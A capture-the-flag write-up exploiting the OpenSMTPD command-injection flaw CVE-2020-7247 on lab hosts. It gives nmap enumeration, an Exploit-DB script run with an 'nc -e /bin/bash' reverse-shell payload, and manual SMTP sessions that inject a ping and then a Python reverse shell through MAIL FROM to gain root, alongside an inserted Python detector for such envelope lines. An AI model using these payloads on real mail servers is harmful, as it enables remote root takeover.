This is a target running an OpenSMTPD instance vulnerable to CVE-2020-7247.
Description
A vulnerability discovered in OpenSMTPD, OpenBSD's mail server, has been exploitable since May 2018 (commit a8e222352f, "switch smtpd to new grammar") and allows an attacker to execute arbitrary shell commands as root.
Enumeration With Nmap
nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.33
# Nmap 7.91 scan initiated Sat Dec 4 09:26:10 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.33
Increasing send delay for 10.0.100.33 from 0 to 5 due to 230 out of 766 dropped probes since last increase.
Warning: 10.0.100.33 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.0.100.33 from 640 to 1000 due to 108 out of 358 dropped probes since last increase.
Nmap scan report for 10.0.100.33
Host is up (0.15s latency).
Not shown: 40969 closed ports, 24565 filtered ports
PORT STATE SERVICE
25/tcp open smtp
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Dec 4 09:27:14 2021 -- 1 IP address (1 host up) scanned in 64.35 seconds
As always, let's run the default nmap scripts and service detection against the open port.
nmap -sC -sV -oA nmap/normal -p 25 10.0.100.33
# Nmap 7.91 scan initiated Sat Dec 4 09:28:37 2021 as: nmap -sC -sV -oA nmap -p 25 10.0.100.33
Nmap scan report for 10.0.100.33
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp OpenSMTPD
| smtp-commands: CVE-2020-7247.echocity-f.com Hello nmap.scanme.org [10.10.0.186], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
Service Info: Host: CVE-2020-7247.echocity-f.com
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 4 09:28:45 2021 -- 1 IP address (1 host up) scanned in 7.42 seconds
Now let's do some research on Google; there is already an exploit for this on Exploit-DB.
Smooth, let's run it.
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/CVE-2020-7247]
└─$ python3 47984.py 10.0.100.33 25 'nc -e /bin/bash 10.10.0.186 1337'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done
Now let's check the Ncat listener.
We are done.
A QUICK MANUAL WAY
┌──(muzec㉿kali)-[~/Documents/PTD/10.150.150.188]
└─$ sudo tcpdump ip proto \\icmp -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
└─$ telnet 10.150.150.188 25
Trying 10.150.150.188...
Connected to 10.150.150.188.
Escape character is '^]'.
220 canyon ESMTP OpenSMTPD
HELO x
250 canyon Hello x [127.0.0.1], pleased to meet you
MAIL FROM:<;ping -c 4 10.66.67.86;>
250 2.0.0 Ok
RCPT TO:<root>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
muzec
.
250 2.0.0 e5c799d7 Message accepted for delivery
QUIT
221 2.0.0 Bye
Connection closed by foreign host.
We should get a hit back on our tcpdump listener.
└─$ sudo tcpdump ip proto \\icmp -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
00:58:53.425915 IP 10.150.150.188 > kali: ICMP echo request, id 170, seq 1, length 64
00:58:53.425923 IP kali > 10.150.150.188: ICMP echo reply, id 170, seq 1, length 64
00:58:54.433819 IP 10.150.150.188 > kali: ICMP echo request, id 170, seq 2, length 64
00:58:54.433831 IP kali > 10.150.150.188: ICMP echo reply, id 170, seq 2, length 64
00:58:56.462761 IP 10.150.150.188 > kali: ICMP echo request, id 170, seq 4, length 64
00:58:56.462773 IP kali > 10.150.150.188: ICMP echo reply, id 170, seq 4, length 64
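As an added defensive illustration (not part of the original writeup), here is a small Python check that a mail-log parser or IDS rule could apply to captured SMTP envelope commands: it flags a sender path whose local part is malformed, has no domain, and carries shell metacharacters, which is exactly the shape the session above used. The allowed local-part character set and the SHELL_META list are this detector's own assumptions, not OpenSMTPD's tables.

```python
import re

# Unquoted local-part characters RFC 5321 allows besides letters and digits (assumed set).
ATEXT_EXTRA = set("!#$%&'*+-/=?^_`{|}~.")

# Shell metacharacters that must never reach a delivery command line (assumed set).
SHELL_META = set(";|&`$<>(){}\\\"'\n")

PATH_RE = re.compile(r"^(?:MAIL FROM|RCPT TO):\s*<(?P<path>[^>]*)>", re.IGNORECASE)


def split_path(path):
    """Return (local_part, domain); domain is '' when the path has no '@'."""
    if "@" in path:
        return tuple(path.rsplit("@", 1))
    return path, ""


def local_part_is_valid(local):
    """Unquoted local-part: alphanumerics plus ATEXT_EXTRA, no leading/trailing/double dots."""
    if not local or local.startswith(".") or local.endswith(".") or ".." in local:
        return False
    return all(c.isalnum() or c in ATEXT_EXTRA for c in local)


def classify(line):
    """'ok', 'invalid' (malformed, should be rejected) or 'suspicious' (the CVE-2020-7247
    shape: malformed local part, no domain, shell metacharacters present)."""
    m = PATH_RE.match(line.strip())
    if not m:
        return "ok"                      # not an envelope command
    path = m.group("path")
    if path == "":
        return "ok"                      # empty return-path is legitimate for bounces
    local, domain = split_path(path)
    if local_part_is_valid(local):
        return "ok"
    if domain == "" and SHELL_META & set(local):
        return "suspicious"
    return "invalid"


def scan(lines):
    return [(l, classify(l)) for l in lines if classify(l) != "ok"]


# Constructed sample session: the envelope lines seen in this writeup plus benign traffic.
SAMPLE_SESSION = [
    "HELO x", "MAIL FROM:<alice@example.org>", "MAIL FROM:<>",
    "MAIL FROM:<;ping -c 4 10.66.67.86;>",
    "RCPT TO:<root>", "RCPT TO:<bob..smith@example.org>",
]
```

Running scan(SAMPLE_SESSION) reports the ping sender as suspicious and the double-dot recipient as merely invalid; a patched server rejects both, while the vulnerable one only rejects the second.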
┌──(muzec㉿kali)-[~/Documents/PTD]
└─$ telnet 10.150.150.188 25
Trying 10.150.150.188...
Connected to 10.150.150.188.
Escape character is '^]'.
220 canyon ESMTP OpenSMTPD
HELO X
250 canyon Hello X [127.0.0.1], pleased to meet you
MAIL FROM:<;python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.66.67.86\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")";>
250 2.0.0 Ok
RCPT TO:<root>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
muzec
.
250 2.0.0 ba87387d Message accepted for delivery
┌──(muzec㉿kali)-[~/Documents/PTD/10.150.150.188]
└─$ sudo nc -nvlp 80
listening on [any] 80 ...
connect to [10.66.67.86] from (UNKNOWN) [10.150.150.188] 51746
root@canyon:~#
Greetings From Muzec